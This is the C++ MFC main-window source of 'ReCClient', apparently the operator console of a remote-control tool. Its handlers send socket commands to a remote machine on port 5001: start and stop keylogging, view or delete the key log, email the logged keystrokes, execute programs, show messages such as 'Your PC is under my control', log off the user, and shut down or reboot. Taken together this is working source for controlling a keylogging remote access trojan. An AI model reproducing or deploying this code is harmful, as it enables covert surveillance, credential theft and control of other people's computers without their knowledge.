/*
 * This program is free software; you can redistribute it
 * and/or modify it under the terms of the Shared Code
 * License (SCL) as published by www.IntellectualHeaven.com;
 * either version 1.0, or (at your option) any later version.
 *
 * You should have received a copy of the SCL 1.0 license,
 * look for file license.txt, along with this software; if not,
 * then please write to xx_pankaj_xx@intellectualheaven.com
 * for an electronic copy of the same.
 */

/* ++
History (in reverse order)

xx_pankaj_xx@intellectualheaven.com   2003-08-18
First version created and checked in CVS
-- */

// MainFrm.cpp : implementation of the CMainFrame class
//

#include "stdafx.h"
#include "ReCClient.h"
#include "L_GENERIC_SOCKET.h"
#include "MainFrm.h"

#include "L_TASK_MANAGER.h"
#include "L_VIEW_DATA_DLG.h"
#include "L_WINDOW_LIST_DLG.h"
#include "L_EXPLORER.h"
#include "L_SHUT.h"
#include "L_CONNECT.h"
#include "L_MESSAGE.h"
#include "L_MAIL.h"
#include "L_EXECUTE.h"
#include "L_SERVICE.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CMainFrame
extern SOCKET g_sock_client;
extern bool g_is_connected;

IMPLEMENT_DYNCREATE(CMainFrame, CFrameWnd)

BEGIN_MESSAGE_MAP(CMainFrame, CFrameWnd)
	//{{AFX_MSG_MAP(CMainFrame)
	ON_WM_CREATE()
	ON_COMMAND(ID_COMMAND_PROCESSHANDLING_TASKMANAGER, OnCommandProcesshandlingTaskmanager)
	ON_COMMAND(ID_COMMAND_PROCESSHANDLING_EXECUTE, OnCommandProcesshandlingExecute)
	ON_COMMAND(ID_COMMAND_CONSOLEANDWINDOWS_LISTACTIVEWINDOWS, OnCommandConsoleandwindowsListactivewindows)
	ON_COMMAND(ID_COMMAND_CONSOLEANDWINDOWS_MESSAGEBOX, OnCommandConsoleandwindowsMessagebox)
	ON_COMMAND(ID_COMMAND_KEYLOGGING_STARTKEYLOGGING, OnCommandKeyloggingStartkeylogging)
	ON_COMMAND(ID_COMMAND_KEYLOGGING_STOPKEYLOGGING, OnCommandKeyloggingStopkeylogging)
	ON_COMMAND(ID_COMMAND_KEYLOGGING_VIEWLOGGEDDATA, OnCommandKeyloggingViewloggeddata)
	ON_COMMAND(ID_FILE_CONNECT, OnFileConnect)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_PROCESSHANDLING_TASKMANAGER, OnUpdateCommandProcesshandlingTaskmanager)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_CONSOLEANDWINDOWS_LISTACTIVEWINDOWS, OnUpdateCommandConsoleandwindowsListactivewindows)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_CONSOLEANDWINDOWS_MESSAGEBOX, OnUpdateCommandConsoleandwindowsMessagebox)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_KEYLOGGING_STARTKEYLOGGING, OnUpdateCommandKeyloggingStartkeylogging)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_KEYLOGGING_STOPKEYLOGGING, OnUpdateCommandKeyloggingStopkeylogging)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_KEYLOGGING_VIEWLOGGEDDATA, OnUpdateCommandKeyloggingViewloggeddata)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_PROCESSHANDLING_EXECUTE, OnUpdateCommandProcesshandlingExecute)
	ON_COMMAND(ID_COMMAND_KEYLOGGING_EMPTYLOGFILE, OnCommandKeyloggingEmptylogfile)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_KEYLOGGING_EMPTYLOGFILE, OnUpdateCommandKeyloggingEmptylogfile)
	ON_COMMAND(ID_COMMAND_FILEMANIPULATION_EXPLORER, OnCommandFilemanipulationExplorer)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_FILEMANIPULATION_EXPLORER, OnUpdateCommandFilemanipulationExplorer)
	ON_COMMAND(ID_COMMAND_KEYLOGGING_SENDMAIL, OnCommandKeyloggingSendmail)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_KEYLOGGING_SENDMAIL, OnUpdateCommandKeyloggingSendmail)
	ON_COMMAND(ID_FILE_LOGOFF, OnFileLogoff)
	ON_UPDATE_COMMAND_UI(ID_FILE_LOGOFF, OnUpdateFileLogoff)
	ON_COMMAND(ID_FILE_SHUTDOWN, OnFileShutdown)
	ON_UPDATE_COMMAND_UI(ID_FILE_SHUTDOWN, OnUpdateFileShutdown)
	ON_COMMAND(ID_FILE_DISCONNECT, OnFileDisconnect)
	ON_UPDATE_COMMAND_UI(ID_FILE_DISCONNECT, OnUpdateFileDisconnect)
	ON_UPDATE_COMMAND_UI(ID_FILE_CONNECT, OnUpdateFileConnect)
	ON_COMMAND(ID_COMMAND_PROCESSHANDLING_SERVICEMANAGER, OnCommandProcesshandlingServicemanager)
	ON_UPDATE_COMMAND_UI(ID_COMMAND_PROCESSHANDLING_SERVICEMANAGER, OnUpdateCommandProcesshandlingServicemanager)
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

static UINT indicators[] =
{
	ID_SEPARATOR,           // status line indicator
	ID_INDICATOR_CAPS,
	ID_INDICATOR_NUM,
	ID_INDICATOR_SCRL,
};

/////////////////////////////////////////////////////////////////////////////
// CMainFrame construction/destruction

CMainFrame::CMainFrame()
{
	//m_bit_map.LoadBitmap(IDB_MY_NAME);
}

CMainFrame::~CMainFrame()
{
}

int CMainFrame::OnCreate(LPCREATESTRUCT lpCreateStruct)
{
	if (CFrameWnd::OnCreate(lpCreateStruct) == -1)
		return -1;
	
	if (!m_wndToolBar.CreateEx(this, TBSTYLE_FLAT, WS_CHILD | WS_VISIBLE | CBRS_TOP
		| CBRS_GRIPPER | CBRS_TOOLTIPS | CBRS_FLYBY | CBRS_SIZE_DYNAMIC) ||
		!m_wndToolBar.LoadToolBar(IDR_MAINFRAME))
	{
		TRACE0("Failed to create toolbar\n");
		return -1;      // fail to create
	}

	if (!m_wndStatusBar.Create(this) ||
		!m_wndStatusBar.SetIndicators(indicators,
		  sizeof(indicators)/sizeof(UINT)))
	{
		TRACE0("Failed to create status bar\n");
		return -1;      // fail to create
	}

	m_wndToolBar.EnableDocking(CBRS_ALIGN_ANY);
	EnableDocking(CBRS_ALIGN_ANY);
	DockControlBar(&m_wndToolBar);

	return 0;
}

BOOL CMainFrame::PreCreateWindow(CREATESTRUCT& cs)
{
	if( !CFrameWnd::PreCreateWindow(cs) )
		return FALSE;
	return TRUE;
}

/////////////////////////////////////////////////////////////////////////////
// CMainFrame diagnostics

#ifdef _DEBUG
void CMainFrame::AssertValid() const
{
	CFrameWnd::AssertValid();
}

void CMainFrame::Dump(CDumpContext& dc) const
{
	CFrameWnd::Dump(dc);
}

#endif //_DEBUG

/////////////////////////////////////////////////////////////////////////////
// CMainFrame message handlers

void CMainFrame::OnCommandProcesshandlingTaskmanager() 
{
	CL_TASK_MANAGER dlg;
	dlg.DoModal();
}

void CMainFrame::OnCommandProcesshandlingExecute() 
{
	CL_EXECUTE exec_dlg;

	if (exec_dlg.DoModal() == IDOK)
	{
		CString sz_data = "Execute|*|*|";
		sz_data += exec_dlg.m_exe_path;
		sz_data += "|*|*|";

		CL_GENERIC_SOCKET::Send(	g_sock_client,
									(void*)(LPCTSTR)sz_data,
									sz_data.GetLength());
	}
}

void CMainFrame::OnCommandConsoleandwindowsListactivewindows() 
{
	CL_WINDOW_LIST_DLG dlg;
	dlg.DoModal();
	
}

void CMainFrame::OnCommandConsoleandwindowsMessagebox() 
{
	CString sz_data = "MessageBox|*|*|"; //How are u man?\r\nYour PC is under my control.|*|*|Remote Control|*|*|
	CL_MESSAGE msg_dlg;
	if (msg_dlg.DoModal() == IDOK)
	{
		sz_data += msg_dlg.m_msg;
		sz_data += "|*|*|";
		sz_data += msg_dlg.m_title;
		sz_data += "|*|*|";
		CL_GENERIC_SOCKET::Send(	g_sock_client,
									(void*)(LPCTSTR)sz_data,
									sz_data.GetLength());
	}
}

void CMainFrame::OnCommandKeyloggingStartkeylogging() 
{
	CString sz_data = "StartKeyLogging|*|*|";
	CL_GENERIC_SOCKET::Send(	g_sock_client,
								(void*)(LPCTSTR)sz_data,
								sz_data.GetLength());
		
}

void CMainFrame::OnCommandKeyloggingStopkeylogging() 
{
	CString sz_data = "StopKeyLogging|*|*|";
	CL_GENERIC_SOCKET::Send(	g_sock_client,
								(void*)(LPCTSTR)sz_data,
								sz_data.GetLength());
}

void CMainFrame::OnCommandKeyloggingViewloggeddata() 
{
	CL_VIEW_DATA_DLG obj;
	obj.DoModal();
}

void CMainFrame::OnFileConnect() 
{
	CL_CONNECT conn_dlg;
	
	if (conn_dlg.DoModal() == IDCANCEL)
		return;


	g_sock_client = socket(	AF_INET,
							SOCK_STREAM,
							0);
	if(g_sock_client == SOCKET_ERROR)
	{
		AfxMessageBox("\nSocket creation failed. Shit Man");
		return;
	}
	sockaddr_in serv_addr;
	serv_addr.sin_family = AF_INET;
	serv_addr.sin_port = htons(5001);

	if (inet_addr(conn_dlg.m_ip) == INADDR_NONE)
	{
		HOSTENT *serv_add = gethostbyname(conn_dlg.m_ip);
		if (serv_add == NULL)
		{
			AfxMessageBox("Illegal IP address or Server Name");
			return;
		}

		serv_addr.sin_addr.S_un.S_addr = ((IN_ADDR*)serv_add->h_addr)->S_un.S_addr;
	}
	else
	{
		serv_addr.sin_addr.S_un.S_addr = inet_addr(conn_dlg.m_ip);
	}
	
	if(connect(	g_sock_client,
				(const sockaddr*)&serv_addr,
				sizeof(serv_addr)) == SOCKET_ERROR)
	{
		int i = GetLastError();
		AfxMessageBox("\nCould not connect to the specified server");
	}
	else
	{
		g_is_connected = true;
	}
}

void CMainFrame::OnUpdateCommandProcesshandlingTaskmanager(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}


void CMainFrame::OnUpdateCommandConsoleandwindowsListactivewindows(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnUpdateCommandConsoleandwindowsMessagebox(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}
 
void CMainFrame::OnUpdateCommandKeyloggingStartkeylogging(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnUpdateCommandKeyloggingStopkeylogging(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnUpdateCommandKeyloggingViewloggeddata(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnUpdateCommandProcesshandlingExecute(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnCommandKeyloggingEmptylogfile() 
{
	CString sz_data = "DeleteLoggedData|*|*|";
	if(CL_GENERIC_SOCKET::Send(	g_sock_client,
								(void*)(LPCTSTR)sz_data,
								sz_data.GetLength()) < sz_data.GetLength())
	{
		CReCClientApp::ShowError();
	}
}

void CMainFrame::OnUpdateCommandKeyloggingEmptylogfile(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnCommandFilemanipulationExplorer() 
{
	CL_EXPLORER dlg;
	dlg.DoModal();
}

void CMainFrame::OnUpdateCommandFilemanipulationExplorer(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnCommandKeyloggingSendmail() 
{
	CL_MAIL mail_dlg;
	if (mail_dlg.DoModal() == IDOK)
	{
		CString sz_data = "SendMail|*|*|";
		sz_data += mail_dlg.m_ip;
		sz_data += "|*|*|";
		sz_data += mail_dlg.m_mail_id;
		sz_data += "|*|*|";

		CL_GENERIC_SOCKET::Send(	g_sock_client,
									(void*)(LPCTSTR)sz_data,
									sz_data.GetLength());
	}
}

void CMainFrame::OnUpdateCommandKeyloggingSendmail(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnFileLogoff() 
{
	CString sz_data = "Logoff|*|*|";

	if (AfxMessageBox("Are you sure you want current user to be logged off?", MB_ICONQUESTION | MB_YESNO) == IDYES)
	{
		if(CL_GENERIC_SOCKET::Send(	g_sock_client,
									(void*)(LPCTSTR)sz_data,
									sz_data.GetLength()) < sz_data.GetLength())
		{
			CReCClientApp::ShowError();
		}
	}
}

void CMainFrame::OnUpdateFileLogoff(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnFileShutdown() 
{
	CL_SHUT shut_dlg;
	CString sz_data;

	if (shut_dlg.DoModal() == IDOK)
	{
		if (shut_dlg.m_shut == 0)
			sz_data = "ShutDown|*|*|";
		else
			sz_data = "Reboot|*|*|";

		if(CL_GENERIC_SOCKET::Send(	g_sock_client,
									(void*)(LPCTSTR)sz_data,
									sz_data.GetLength()) < sz_data.GetLength())
		{
			CReCClientApp::ShowError();
		}
	}
}

void CMainFrame::OnUpdateFileShutdown(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnFileDisconnect() 
{
	closesocket(g_sock_client);
	g_is_connected = false;
}

void CMainFrame::OnUpdateFileDisconnect(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}

void CMainFrame::OnUpdateFileConnect(CCmdUI* pCmdUI) 
{
	if(g_is_connected)
		pCmdUI->Enable(FALSE);
}


void CMainFrame::OnCommandProcesshandlingServicemanager() 
{
	CL_SERVICE dlg;
	dlg.DoModal();
}

void CMainFrame::OnUpdateCommandProcesshandlingServicemanager(CCmdUI* pCmdUI) 
{
	if(!g_is_connected)
		pCmdUI->Enable(FALSE);
}
